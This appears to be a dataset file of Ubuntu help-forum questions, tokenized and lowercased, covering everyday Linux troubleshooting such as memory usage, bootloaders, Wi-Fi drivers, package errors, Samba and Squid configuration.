392466	did ubuntu 12.04 server really eat my ram ?	first of all , i 'm very new to linux but i do n't think this is a `` linux ate my ram '' issue . while searching about my problem i ran in to that issue a lot but it does n't fit with what i see . this seems to be really happening . everything i 've tried is telling me that the ram usage is very very high . i 've tried top , htop , vmstat 2 10 . my hypanel admin page too ( this is a vps that i access remotely ) . also i have started to get errors stating that it can not allocate memory to whatever i 'm trying to do , even opening a terminal . it did n't even have enough ram to allow me to logout of ubuntu at one point . the vps has 1gb of ram . it 's not a lot but from everything i have read it should be more than enough to run , particularly when i have basically no traffic going through it . i have setup apache2 and added 2 domain names pointing to their own html folders . i can access the domains . for example : t4nk.com i then installed some recommended things like modsecurity , fail2ban , mysql , and tried to install php5 which did n't work ( probably because it could n't allocate memory ) , but this may be irrelevant because the ram usage apparently started last month before i did much of anything , as you 'll see in the screenshots below . the first shot is just the general info from hypanel . in the next screenshot you can see that the ram usage spikes back up immediately after turning off the vps for a few minutes : and when i view the ram usage from last month i can see that it all went bad after changing from centos 5 to ubuntu 12.04 . the reason that i changed to ubuntu was that i thought it would be easier for a newbie like me to use , but honestly i have n't gained much from having a gui and i spend most of my time in the terminal just like i did on centos . last month ram usage : top : htop : vmstat 2 10 : i do n't really know what vmstat does , but it was recommended in one of the many threads i read on my many searches for a solution . i hope someone can help me out here . please keep in mind that i 'm very new to linux . how to resolve this ?
392468	i get a ubuntu 13.04 cryptsetup fail error , due to which i can not login , and my harddisk can not be unlocked .	i get a ubuntu 13.04 cryptsetup fail error , due to which i can not login , and my harddisk can not be unlocked . i do have data on the disk . help pls !
392470	boot-repair stuck at os-prober after installing ubuntu 12.04.3 beside windows 8.1	i am using an hp envy 14t laptop which had windows 8.1 pre-installed in it , it has its recovery files in an ssd . i installed ubuntu 12.04.3 following the instructions provided here : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) i could not disable quickboot/fastboot , as i dont have the option in the bios . after the installation finishes the laptop boots straight into windows 8.1 , so as mentioned in the instructions , i boot up ubuntu using a liveusb and run boot-repair , but boot-repair gets stuck at the point where it says : scanning systems ( os-prober ) . this may require several minutes . i wait for 45 minutes or so , but it does not proceed any further . so just out of curiosity i quit boot-repair and run os-prober in the terminal and this is what prints out : ubuntu @ ubuntu : ~ $ sudo os-prober grub-probe : error : can not find a grub drive for /dev/sda1 . check your device.map . ls : reading directory /var/lib/os-prober/mount : input/output error ls : reading directory /var/lib/os-prober/mount : input/output error ls : reading directory /var/lib/os-prober/mount : input/output error ls : reading directory /var/lib/os-prober/mount : input/output error ls : reading directory /var/lib/os-prober/mount : input/output error ls : reading directory /var/lib/os-prober/mount : input/output error ls : reading directory /var/lib/os-prober/mount : input/output error /dev/sdb5 : windows recovery environment ( loader ) : windows : chain /dev/sdb6 : ubuntu 12.04.3 lts ( 12.04 ) : ubuntu : linux and sda is the liveusb that im using . sdb is the hard drive , and sdc is the ssd ( which has windows recovery files ) .
392472	i need to upgrade 8.10 to 13.10	update computer to latest version but the version we have is 8.10 and it is not upgrading to version 13.10 . i message i see is `` server error '' . i dont know how to update in another way .
392476	ubuntu can not detect windows 7 so i can not dual-boot	i wanted to dual boot my windows 7 ( x64 ) with ubuntu 13.10 ( x64 ) . when i get to the stage when i select a partition , it says that ubuntu does not detect any other operating system in my computer . i chose 'something else ' and the only partition that came up was 'free space ' with 500 gb free space ( my hard drive space ) . i set two partitions before installing ubuntu . 414 gb for windows 7 and 50 gb for ubuntu . my disk is not dynamic .
392478	ubuntu server local	i am pretty new at this . i am running an owncloud server on ubuntu in a virtual machine and i want it to be available for all the devices on the same network . at the moment i can only access it from the same device where the virtual machine with the server is on . how do i accomplish this ? i 've searched for some answers but i cant seem to find out what 's the way to do this
392480	i can not get wifi with my toshiba satellite c55-a	i am very new to computing and i wanted to use linux and figured ubuntu is a good place to start learning . on installation i was able to see the option in my network manager that would give an option for mobile networks but that is not wifi and then many of the options disappears after a couple of days . i have tried so many of the of the `` solutions '' that are on here but none of them has had an effect and this may be due to my lack of basic understanding of the os . chickenbone @ cbmindscape : ~/desktop/backports-3.11-rc3-1 $ sudo modprobe -r rtl8188ee & & sudo modprobe rtl8188ee fatal : error inserting rtl8188ee ( /lib/modules/3.8.0-34-generic/updates/drivers/net/wireless/rtlwifi/rtl8188ee/rtl8188ee.ko ) : unknown symbol in module , or unknown parameter ( see dmesg ) i had begun experimenting with many things like this and have a feeling that i may be just doing too much and the overlap of random garbage may be a problem . this is the most recent code in a long line of attempts found on this board . i got rtl_92ce_92se_92de_8723ae_88ee_linux_mac80211_0012.0207.2013 from realteks website and tried to install this as well and it was not working . i could not find an inf file in windows wireless drivers to add so thats no good . what is going on here ? i have been at this for about 5 days now and would like this mess solved . there are no additional drivers to enable . i lack many basic computing skills so please treat me with kid gloves , i need to learn .
392481	edit the unity-greeter theme	i am trying to get rid of some of the indicator icons on the lightdm login screen ( or maybe just get rid of everything ) . no luck so far . the file i am editing is @ /usr/share/glib-2.0/schemas/com.canonical.unity-greeter.gschema.xml on ubuntu 12.04.3 . after making the changes , i compile with sudo glib-compile-schemas /usr/share/glib-2.0/schemas/ command . when i test with lightdm -- test-mode it seems that lightdm is going on an endless loop . anybody here has successfully removed the indicators before ? i just want the power indicator , or perhaps if it 's possible , totally remove all indicators . thanks ! edit : by power i meant the shutdown/restart indicator , which is rightfully called session indicator .
392482	is there an easily searchable database of hardware that works with ubuntu ?	i 'm looking to buy a new custom-built laptop and i want to know that the hardware will work . do canonical provide any tools so that would-be users can check if their hardware works ? i 've seen the certification website but this focusses on whole systems from massive companies ; it does not have the detail i need . i need to know about wireless : intel centrino n 2230 clevo w550su1 chassis with intel 8 series chipset http : //www.fortunetechnology.com/view/3877/ for 12.04 but the question is a general one about a searchable database provided by ubuntu . ( obviously i have heard of google . )
392483	ca n't find ubuntu software-center	i think i might have deleted my ubuntu software-center or something . all i know is i ca n't find it in my computer . i 've already tried the terminal commands to re-install it but it says i already have ubuntu software-center , yet it 's no where on my computer . so now i 've downloaded software center from the internet but now i do n't have the right program to open it .
392487	creating link to files on external server	i am compiling and running my program on an external server via ssh currently . however , it would be very easy for me if i could additionally edit the files on the server directly via my favorite ide , instead of doing it locally and then upload via ftp . what is the easiest way to do this ? edit : it is a linux-server , red hat .
392491	ca n't install arnet mondem 3g on ubuntu	i ca n't install arnet modem 3g on my ubuntu . there are a tutorial here but when i start : vitor @ vitor-hp : ~/downloads/arnet $ ls autorun.sh install_linux linux sysconfig.dat vitor @ vitor-hp : ~/downloads/arnet $ sudo sh autorun.sh autorun.sh : 6 : autorun.sh : /install_linux : not found i already copied all files on my notebook . but when i run : vitor @ vitor-hp : ~/downloads/arnet $ sudo sh autorun.sh appears autorun.sh : 6 : autorun.sh : /install_linux : not found but this file exit vitor @ vitor-hp : ~/downloads/arnet $ ls autorun.sh install_linux linux sysconfig.dat and i already change the permission too .
392498	how to uninstall rubymine 5.4.3.2.1 ?	i was trying to upgrade from rubymine 5.4.3.2.1 to 6 for that i was trying to uninstall rubymine 5.4.3.2.1 . i removed rubymine directory from where i installed rubymine . now everytime i need to run rubymine version 6 from the .sh file given in rubymine 6 . how to completely remove the rubymine and do a fresh installation .
392504	how can i copy my data from ntfs error partition to external medium ?	i think i made a beginner mistake when i installed ubuntu 13 . i deleted my windows 8 and then installed ubuntu on my main partition as ext4 . i also made a swap partition but i left my other 2 partitions ( with important data on them ) as ntfs because i was scared of losing data . when i try to open one of them i get following error : '' error mounting /dev/sda2 at /media/markus/28167e1f167dede6 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/markus/28167e1f167dede6 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . '' i read something about windows 8 hybrid shutdown that could solve my problem but i ca n't really change that , since i deleted my windows . is there something else i can do or do i have to install windows 8 again ?
392508	can i play cod mw3 on ubuntu ?	i use ubuntu 12.04 . before that i used windows 8 . can i play `` call of duty : modern warfare 3 '' through wine ? the games that i could play before , can i play them now ? i only care about single-player mode so anything like `` steam '' or `` garena '' or any other service like this , is useless for me .
392509	how to fix keyboard shortcut toggle for keyboard layout ?	i use both german and us american layout . for convenience , i defined a shortcut to toggle these via scroll . i also have an indicator on the top gnome shell bar that shows the current layout . yet recently , i assume it has something to do with the 13.10 upgrade , pressing the shortcut does not toggle the layout in the current application even though the indicator shows the change . strangely , going into the keyboard applet via mouse and there selecting the layout works . how do i get the keyboard shortcut working again ?
392512	why no gnome session ?	i have installed gnome-shell with sudo apt-get install gnome-shell and its successfully installed but i cant find it in the sessions list at login screen . what might be the reason ? here are the needed details august @ august-oem : ~ $ ls /usr/share/xsessions awesome.desktop cinnamon2d.desktop xfce.desktop cairo-dock.desktop cinnamon.desktop xubuntu.desktop august @ august-oem : ~ $ apt-cache policy gnome-shell gnome-shell : installed : 3.8.4-0ubuntu5 candidate : 3.8.4-0ubuntu5 version table : *** 3.8.4-0ubuntu5 0 500 http : //in.archive.ubuntu.com/ubuntu/ saucy/universe i386 packages 100 /var/lib/dpkg/status august @ august-oem : ~ $
392513	login screen not displayed after logout	i 'm running ubuntu gnome 13.10 and i 'm having the following problem . after booting my computer , gdm displays as expected and i can choose which account to log in to . however , if i then log out , i do not get the login screen any more , with instead just some text , similar to the problem described in here . after logging out , i 've found that xorg is taking 100 % cpu , and killing this process causes gdm to start up as usual again . one hacky solution i have found is to restart gdm after a session has finished by adding killall -9 xorg to /etc/gdm/postsession/default . i 'm using the nvidia proprietary driver on a laptop , with the laptop screen switched off and two external monitors ( maybe a little unusual ) . a similar problem is described in here , but this solution does not fix the problem . so my question is , has anybody experienced this or something similar ? what is the cause ? and is there a better solution than just killing xorg at the end of every session ?
392522	electronics hl-340 usb-serial adapter	i need a little help installing a program called allflex . to install the same i need to assign the usb port to com1 first installed the program by wine , and ran the command : $ dmesg $ com1=/dev/ttys0 $ sudo ln -sb /dev/ttyusb0 /dev/ttys0 even so the program does not open ... error no com port available ! there is either no com port installed on this computer or all port are used by different applications . close these applications and relaunch configurator . configurator will terminate .
392523	ca n't install php5 because of `` held broken packages ''	i try to install php5 on my ubuntu server . but i have the following problem : root @ myserver /etc/apache2/mods-available # sudo apt-get install php5 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : php5 : depends : libapache2-mod-php5 ( > = 5.3.10-1ubuntu3 ) but it is not going to be installed or libapache2-mod-php5filter ( > = 5.3.10-1ubuntu3 ) but it is not going to be installed or php5-cgi ( > = 5.3.10-1ubuntu3 ) but it is not going to be installed or php5-fpm ( > = 5.3.10-1ubuntu3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . if i try to install packages from depends i still have others similar errors .
392532	ubuntu 12.04 lts network icon mistaken	after some diagonic processure , i 've found that my wireless network has not yet resolved but my wired connection has mistaken the wrong icon . eth0 link encap : ethernet hwaddr 20:6a:8a:3f:70:90 inet addr:172.29.2.181 bcast:172.29.15.255 mask:255.255.240.0 inet6 addr : fe80 : :226a:8aff : fe3f:7090/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:3328 errors:0 dropped:0 overruns:0 frame:0 tx packets:1414 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1324723 ( 1.3 mb ) tx bytes:260711 ( 260.7 kb ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:79866 errors:0 dropped:0 overruns:0 frame:0 tx packets:79866 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10583710 ( 10.5 mb ) tx bytes:10583710 ( 10.5 mb ) warning : you should run this program as super-user . *-network unclaimed description : network controller product : ar9287 wireless network adapter ( pci-express ) vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : cap_list configuration : latency=0 resources : memory : f1600000-f160ffff *-network description : ethernet interface product : netlink bcm57785 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 10 serial : 20:6a:8a:3f:70:90 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.123 duplex=full firmware=sb ip=172.29.2.181 latency=0 multicast=yes port=twisted pair speed=100mbit/s resources : irq:19 memory : f1400000-f140ffff memory : f1410000-f141ffff memory : f1450000-f14507ff warning : output may be incomplete or inaccurate , you should run this program as super-user . anyone can help ? according to chili555 , i 've tried modprobe ath9k & & dmesg | grep ath [ 339970.692404 ] ath : phy0 : chip reset failed [ 339970.692409 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 339970.809499 ] ath : phy0 : chip reset failed [ 339970.809504 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 339970.925151 ] ath : phy0 : chip reset failed [ 339970.925156 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 340612.711783 ] ath : phy0 : chip reset failed [ 340612.711789 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 340612.829633 ] ath : phy0 : chip reset failed [ 340612.829639 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 340612.945773 ] ath : phy0 : chip reset failed [ 340612.945779 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 340626.001522 ] ath : phy0 : chip reset failed [ 340626.001527 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 346785.942351 ] ath : phy0 : chip reset failed [ 346785.942356 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 346786.059931 ] ath : phy0 : chip reset failed [ 346786.059936 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 346786.176004 ] ath : phy0 : chip reset failed [ 346786.176009 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 347318.499218 ] ath : phy0 : chip reset failed [ 347318.499224 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 347335.167438 ] ath : phy0 : chip reset failed [ 347335.167444 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 347335.284839 ] ath : phy0 : chip reset failed [ 347335.284845 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 347335.400957 ] ath : phy0 : chip reset failed [ 347335.400962 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 348371.939924 ] ath : phy0 : chip reset failed [ 348371.939929 ] ath : phy0 : unable to reset hardware ; reset status -22 ( freq 2412 mhz ) [ 349456.895035 ] ath9k : ath9k : driver unloaded [ 349465.420567 ] ath9k 0000:03:00.0 : enabling device ( 0000 - > 0002 ) [ 349465.535474 ] ath : phy1 : could n't reset chip [ 349465.535478 ] ath : phy1 : unable to initialize hardware ; initialization status : -5 [ 349465.535484 ] ath9k 0000:03:00.0 : failed to initialize device [ 349465.535575 ] ath9k : probe of 0000:03:00.0 failed with error -5 [ 349648.631049 ] ath9k : ath9k : driver unloaded [ 349658.068003 ] ath : phy2 : could n't reset chip [ 349658.068008 ] ath : phy2 : unable to initialize hardware ; initialization status : -5 [ 349658.068014 ] ath9k 0000:03:00.0 : failed to initialize device [ 349658.068066 ] ath9k : probe of 0000:03:00.0 failed with error -5 [ 427830.275860 ] ath9k : ath9k : driver unloaded [ 427833.430991 ] ath : phy3 : could n't reset chip [ 427833.431006 ] ath : phy3 : unable to initialize hardware ; initialization status : -5 [ 427833.431023 ] ath9k 0000:03:00.0 : failed to initialize device [ 427833.431280 ] ath9k : probe of 0000:03:00.0 failed with error -5 [ 428873.448746 ] ath9k : ath9k : driver unloaded [ 429026.303871 ] ath : phy4 : could n't reset chip [ 429026.303877 ] ath : phy4 : unable to initialize hardware ; initialization status : -5 [ 429026.303882 ] ath9k 0000:03:00.0 : failed to initialize device [ 429026.303969 ] ath9k : probe of 0000:03:00.0 failed with error -5 [ 429088.070481 ] ath9k : ath9k : driver unloaded [ 429115.975556 ] ath : phy5 : could n't reset chip [ 429115.975560 ] ath : phy5 : unable to initialize hardware ; initialization status : -5 [ 429115.975565 ] ath9k 0000:03:00.0 : failed to initialize device [ 429115.975616 ] ath9k : probe of 0000:03:00.0 failed with error -5
392533	blank screen upon login after installing opengl	i have an inspiron n5010 running ubuntu13.10 64b . it uses intal hd graphics ( i.e . no ati/nvidia graphics card ) i need a software that uses opengl , and i installed multiple packages using synaptic that had the word `` opengl '' now , system boots up fne , but i only get a blank screen when i login ( i can see and move the mouse pointer ) . closing the laptop lid , or pressing ctrl+alt+l gives me the usual lock screen w/o any problems . after opening tty1 , i ran startx which again switched to a black screen . going back to tty1 , i saw startx was stuck at loading extension glx . used ctrl+c to close it after googling , i tried sudo apt-get reinstall ubuntu-desktop sudo apt-get unity but it did not help any ideas on what i should do now ?
392536	what is the error ?	i 'm trying to file a bug report at https : //bugs.launchpad.net/ubuntu/+filebug/ ? no-redirect . when i click submit , i get a response of `` there is 1 error . '' would someone please tell me what the error is ? the web service is not telling me what the problem is .
392539	how do i uninstall xfce and other gui in ubuntu 12.04 server ?	i 'm very new to linux . i thought having a gui would be nice , but it is using too much ram so i 'd like to just use the regular terminal for now . i have ubuntu 12.04 server with xfce installed . how can i uninstall all gui related packages and everything that came with them ?
392544	no internet access using wireless connection	i am using ubunut 12.04 , i was getting internet access using this wifi in last week , but from today it is connected but no internet access ! ! i am unable to connect to the internet using the wireless network ( wifi ) , on ubuntu 12.04 . this was working fine past week . now , it shows to be connected but still i have no access to internet .
392547	netflix-desktop app and newest ubuntu ?	i currently have ubuntu 12.10 and have netflix on it and it works great btw ! ! what i 'm wondering is if i upgrade to a newer version of ubuntu , is it going to effect my netflix working properly or do i need to make some changes like reinstalling or updating ? i only added the netflix app about a month ago so i think it should be fairly up to date .
392549	upgrade back to latest nautilus/files after downgrading	i made a mistake of installing or downgrading nautilus . i am using ubuntu 13.10 32-bit . on the launcher , when i right-click at the file , there are options for documents , downloads , music , etc , making it a bit easier to open the desired location . how do i go about installing the nautilus version that originally came with the os ? thanks .
392551	unable to apt-get update ( gpg err 'nodata ' )	when i attempt to update in apt-get or aptitude , i get the following error : e : gpg error : http : //packages.medibuntu.org saucy inrelease : clearsigned file is n't valid , got 'nodata ' ( does the network require authentication ? ) medibuntu was a project by ubuntu that contained 'closed ' packages . it has since been closed , and the server shut down . removing the packages seems to be advised . there are several similar questions open on askubuntu and elsewhere , but none are quite the same error , and the solutions have not helped . i 've detailed the steps taken and the results . after each step i ran sudo apt-get update , and received the same err . deleted all references to medibuntu in /var/lib/apt/lists apt-key list : does not show the medibuntu key . many threads refer to the serial of the medibuntu key as being 2ebc26b60c5a2783 . not sure how to confirm that . attempted both techniques for adding the key that have been described here and here . neither works . after both , apt-key list does not include medibuntu , update crashes . sudo apt-get -- yes -- quiet -- allow-unauthenticated install medibuntu-keyring could not find package or ppa sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 2ebc26b60c5a2783 nothing changed . removed dpkg lock and all html files : sudo rm -f /var/lib/dpkg/lock removed all sources that are not from this release , and all things listed in dpkg/status as being dependant on medibuntu . attempted to purge medibuntu ( tried with aptitude apt-get and dpkg -r ) in each case it failed with the message that medibuntu and medibuntu-keyring are not installed . tried using keyserver.pgp.com as a keyserver . added the key using gpg ( and similarly , here ) : gpg -- keyserver keyserver.ubuntu.com -- recv-key 2ebc26b60c5a2783 gpg -a -- export 2ebc26b60c5a2783 | sudo apt-key add - medibuntu is now listed through apt-key list , but still unable to run update ( same err as before ) . running sudo apt-key adv ... ( step 3.2 ) does n't help . tried to remove the keys using apt-key del . removed keys , back to square one . update still not working tried using wget to get an updated medibuntu list file , and tried to reinstall medibuntu-keyring . links are dead , package not found . have found alternate list of keyservers here . does n't look like it will make a difference , as the key is listed in apt-key list . the ppa and package linked from here are no more . checked and updated ownership of gpg files as suggested here . did n't change anything . ran sudo apt-get clean , and rebooted many times as i went along . some unrelated links for the mods who click `` duplicate '' on impulse : here , here , and here i would generate new list files from here but i worry i might have some installed packages that will not therefore be updated , posing a security risk . please help , being unable to update is a serious issue .
392552	how to login to a secured folder with samba ?	so i made a directory for samba and it works . now i secured it and i ca n't acces it . i followed these steps : https : //help.ubuntu.com/12.04/serverguide/samba-fileprint-security.html and followed till : admin users = melissa i have this in my smb.conf : [ share ] comment = ubuntu file server share path = /srv/samba/share browsable = yes security = user guest ok = no read only = no create mask = 0755 read list = @ sambashare write list = @ adm , loko admin users = loko valid users = loko when i go to my ip address i see my directory share . so now when i click on it i have to log in but it wont let me acces when i try to login with the user loko what is going wrong ?
392553	ralink 3070 in ubuntu 12.04 over android ( through usb otg )	firstly sorry for my bad english . im not a native speaker . im trying to install a wi-fi dongle by usb otg in my samsung galaxy s3 lte . with lsusb i havent problems , but when i type iwconfig does n't show the interface . any suggestions ? how can i install drivers from ralink`s website ? thanks for reply and greetings . i have used debă­an kit to install ubuntu in android . http : //sourceforge.net/projects/debian-kit/
392554	problem with update ( 12.04 to 12.10 ) `` the disk drive is not ready or not presented ''	about a day ago i thought it 'd be nice to update my ubuntu from 12.04 to 12.10 , it all went fine until it asked me to reboot , when i did it ubuntu gave me this message : the disk drive for ( i ca n't remember clearly the name , i am sorry ) is not ready or not presented continue to wait or press s to skip mounting or m for manual recovery my best thought was `` let 's wait and see if it starts later '' , after a few minutes the message dissapeared , and after 5 hours of waiting with a black screen i thought it was pretty obvious it was n't going to start on its own . i googled some way to fix it but they all asked me to press either s or m , though every time i restarted my pc that little message was gone and all i got was the blank screen . tried with recovery mode but it did n't work . a few things i think might help : i have a dual boot ( ubuntu + windows 7 ) when i enter on recovery mode it says the system is read-only ( thought this might be helpful somehow ) please help me find a solution to my problem or recover my files so i can reinstall ubuntu properly , thanks . p.s . my knowledge in computer stuff is near to none , so i would appreciate if you could explain me step to step on how to solve this .
392557	wifi connection problem or with my laptop ?	what is the problem with my wifi ? could anyone help me ? i have attached the connection information in a screenshot below . thank you for helping .
392558	grey screen starting xubuntu 13.10	when i start xubuntu 13.10 , before the wallpaper and xfce-panel is loaded , i get a grey screen . it is a matter of 1 or 2 seconds . but it is starting to annoy me . i am using composite . but disabling it does n't change anything . also i disabled systemd and xfce-power-control is taking care of my power settings . moreover , i am also using the ppas related with xfce 4.10 and xfce 4.12 . does anyone have the same problem and a solution ?
392559	no sound in headphones on hp dv6 6154tx in ubuntu 12.04	i have installed ubuntu 12.04 on my laptop hp dv6 6154 tx , but no sound is coming from earphones although the speakers are working fine . please help ! ! ! !
392560	how to get remote server 's ip ?	i 've got the server 's adress and i do n't know how to get its ip adress . i have an access via ssh and i need it so bad , please help . ( as for your information i 've been looking for this for some time , seriously : / )
392561	boot failed after building a new kernel . ( kernel options hide )	i built a new kernel and reboot my notebook with the new kernel . unfortunately , the boot failed . i want to reboot by using the original kernel , but there is a windows boot manager which hide the kernel choosing menu . there are only two choices in the boot manager : 1.windows 7 2.ubuntu the ubuntu option can not be chosen in more detailed . i think the ubuntu option is set to use the latest kernel i built . what can i do now ? : '' ( update : now i can see my /home by ubuntu install cd . using `` try ubuntu '' option . any thing i can do to recovery my system ?
392562	can not see wifi channels above 11 despite setting region	i 'm unable to see wifi networks with channels above 11 , despite having set my regulatory region to one in which channels 12 and 13 are allowed . i followed the advice in the question 'how to use wi-fi channels above 11 ? ' and set added a module parameter for my region . i have verified that the parameter has been accepted : > cat /sys/module/cfg80211/parameters/ieee80211_regdom es > iw reg get country es : ( 2402 - 2482 @ 40 ) , ( n/a , 20 ) ( 5170 - 5250 @ 40 ) , ( n/a , 20 ) ( 5250 - 5330 @ 40 ) , ( n/a , 20 ) , dfs ( 5490 - 5710 @ 40 ) , ( n/a , 27 ) , dfs yet still wifi networks above 11 are not visible . i 'm running ubuntu 12.04 on a dell precision m6300 which has a broadcom bcm4312 wifi adapter . i can connect to wifi networks on channel 12 using another os on the same computer , so the problem is not with the hardware . i have two other machines running ubuntu which can see networks on channels above 11 with the default regulatory settings as below . the problem machine also has these settings by default yet they do not allow it to see channels 11 and 12 . > cat /sys/module/cfg80211/parameters/ieee80211_regdom 00 > iw reg get country 00 : ( 2402 - 2472 @ 40 ) , ( 3 , 20 ) ( 2457 - 2482 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 2474 - 2494 @ 20 ) , ( 3 , 20 ) , no-ofdm , passive-scan , no-ibss ( 5170 - 5250 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss ( 5735 - 5835 @ 40 ) , ( 3 , 20 ) , passive-scan , no-ibss i 'm not sure whether it 's relevant , but regardless of the module parameter , running crda on all three machine reports : country environment variable not set . what else can i try to allow the machine to see networks on channels 12 and 13 ? edit > sudo iwlist eth2 chan eth2 32 channels in total ; available frequencies : channel 01 : 2.412 ghz channel 02 : 2.417 ghz channel 03 : 2.422 ghz channel 04 : 2.427 ghz channel 05 : 2.432 ghz channel 06 : 2.437 ghz channel 07 : 2.442 ghz channel 08 : 2.447 ghz channel 09 : 2.452 ghz channel 10 : 2.457 ghz channel 11 : 2.462 ghz channel 12 : 2.467 ghz channel 13 : 2.472 ghz channel 36 : 5.18 ghz channel 38 : 5.19 ghz channel 40 : 5.2 ghz channel 42 : 5.21 ghz channel 44 : 5.22 ghz channel 46 : 5.23 ghz channel 48 : 5.24 ghz channel 52 : 5.26 ghz channel 56 : 5.28 ghz channel 60 : 5.3 ghz channel 64 : 5.32 ghz channel 100 : 5.5 ghz channel 104 : 5.52 ghz channel 108 : 5.54 ghz channel 112 : 5.56 ghz channel 116 : 5.58 ghz channel 120 : 5.6 ghz channel 124 : 5.62 ghz channel 128 : 5.64 ghz
392565	flash/java problem in ubuntu 12.04 lts	i am having a different kind of problem in ubuntu and i have searched a lot and used a lot of commands , but all in vain . the problem is when i try to watch youtube videos , it takes quite a lot of time to load , or it wo n't load , but no error will show up . same happens if i try to open a chat-cam site , it wo n't load the site , or if it will load , it will take a lot of time . this is happening both in firefox as well as chromium browser . i do n't know whether its a java problem or a firefox problem . though there is one thing i noticed , in the bottom right corner in firefox , the icons to enable to java and silverlight remain always red , and they wo n't change even if i click on them . i am totally a new user of ubuntu , and i really do n't know any of the commands or how to use them . help ! thank you . edit : i have a dual boot system , and everything works just fine in windows .
392568	13.10 drag and drop not working	i am unable to drag and drop items to my ubuntu 13.10 destop . it keeps giving me this error . erro ao copiar . erro ao copiar . houve um erro ao obter informação sobre `` / '' . english : error in copying there was an error getting information about `` / '' .
392569	configuring ftp for ubuntu squid proxy server	can anyone help me to configure ftp access through squid3 i have followed the forums guides and i 'm still unable to get to a ftp site via ie version 9 . it works fine if i do n't go through the proxy so i know its the settings . error : an ftp authentication failure occurred while trying to retrieve the url : ftp : //xxx.xxx.xxx.xxx/ tcp_miss/401 3853 get ftp : //xx.xx.xx.xx/ is from the error log saying i 've missed authentication but i want it to bring up the login screen ? my config below : acl manager proto cache_object acl localhost src 127.0.0.1/32 : :1 acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 : :1 acl localnet src 10.105.8.0 # internal network acl localnet src 192.168.0.0 # dmz network acl ssl_ports port 443 21 22 acl safe_ports port 80 # http acl safe_ports port 8080 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect acl ftp proto ftp http_access allow ftp http_access allow manager localhost http_access deny manager http_access allow ! safe_ports http_access deny connect ! ssl_ports http_access allow localnet http_access allow localhost http_access allow all http_port 8080 cache_mem 1024 mb cache_dir ufs /var/spool/squid3 307200 16 256 cache_store_log /var/log/squid3/store.log coredump_dir /var/spool/squid3 refresh_pattern -i \ . ( gif|png|jpg|jpeg|ico ) $ 87000 90 % 432000 override-expire ignore-no-cache ignore-no-store ignore-private refresh_pattern ^ftp : 1440 20 % 10080 refresh_pattern ^gopher : 1440 0 % 1440 refresh_pattern -i ( /cgi-bin/|\ ? ) 0 0 % 0 refresh_pattern ( release|packages ( .gz ) * ) $ 0 20 % 2880 refresh_pattern . 0 20 % 4320 visible_hostname istaukproxy acl ftp proto ftp always_direct allow ftp dns_nameservers 10.105.10.11 10.105.10.13 8.8.8.8 8.8.4.4 i 've basically added the below to get access : acl ssl_ports port 443 21 # ( edit add the ftp port 21 to ssl port acl ) acl safe_ports port 21 # ftp acl ftp proto ftp # ( create a new acl for ftp protocol ) http_access allow ftp # ( allow browsing above created ftp acl ) is this right and are they in the correct locations ?
